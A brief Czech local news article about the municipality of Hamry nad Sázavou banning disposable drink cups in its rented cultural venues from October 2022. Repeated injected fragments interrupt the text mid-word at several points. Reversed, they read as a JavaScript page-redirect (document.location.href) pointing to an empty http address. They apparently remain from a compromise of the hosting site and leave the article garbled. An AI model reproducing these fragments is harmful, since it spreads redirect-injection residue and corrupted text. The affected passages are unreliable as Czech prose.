Rainbow page separator

Od října v kulturním domě nelze používat jednorázové kelímky

Sobota, 16. července 2022

Hamry nad Sázavou / Podmínky pro pronájem kulturního domu, areálu Na stráni a dalších nemovi[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tostí v majetku obce, které jsou využívány pro konání různých kulturních, společenských a dalších akcí, upravili hamerští zastupitelé. Jde o doplnění zákazu používání jednorázových obalů na podávané nápoje o objemu 0,2 až 0,5 litru včetně.
Na základě usnesení vedení obce bude nájemce zmíněných obecních nemovi[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tostí při akcích povinen využívat buď vlastní opakovaně použitelné obaly, případně dostane možnost si ty[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to třetinkové a půllitrové kelímky na opě[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovné použití zapůjčit přímo od obce. Požadavek zakomponovaný do podmínek pro pronájem hamerských nemovi[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tostí začne platit pro akce konající se od 1. října le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošního roku.